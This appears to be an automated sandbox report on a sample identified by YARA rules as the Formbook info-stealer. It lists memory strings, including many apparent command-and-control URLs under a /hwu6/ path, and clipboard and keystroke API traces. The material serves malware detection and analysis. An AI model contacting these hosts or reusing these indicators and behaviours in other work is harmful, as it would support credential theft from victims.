          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/www.vytech.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.topReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.pro/hwu6/www.inefity.cloud
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dangdut4dselalu.proReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyecosystem.app
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyecosystem.app/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyecosystem.app/hwu6/www.jeeinsight.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.energyecosystem.appReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ffgzgbl.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ffgzgbl.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ffgzgbl.xyz/hwu6/www.suv-deals-49508.bond
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ffgzgbl.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frozenpines.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frozenpines.net/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frozenpines.netReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.club/hwu6/www.energyecosystem.app
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.imxtld.clubReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloud/hwu6/www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.inefity.cloudReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.online/hwu6/www.bethlark.top
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jeeinsight.onlineReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyz/hwu6/www.dangdut4dselalu.pro
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suarahati7.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bond/hwu6/www.imxtld.club
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.suv-deals-49508.bondReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyz/hwu6/www.frozenpines.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vibrantsoul.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyz/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyz/hwu6/www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.victory88-pay.xyzReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.net/hwu6/www.apoppynote.com
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.vytech.netReferer:
          Source: explorer.exe, 00000002.00000002.2900901157.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1668078318.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
          Source: explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
          Source: explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
          Source: explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
          Source: explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
          Source: explorer.exe, 00000002.00000002.2892314485.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2893904960.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1657261670.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1655826093.0000000001248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
          Source: explorer.exe, 00000002.00000002.2898200264.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2898200264.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
          Source: explorer.exe, 00000002.00000002.2898200264.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
          Source: explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000000.1668078318.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2900901157.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000000.1658360423.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0102EAFF
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0102ED6A
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0102EAFF
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0101AB9C
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01049576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_01049576

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
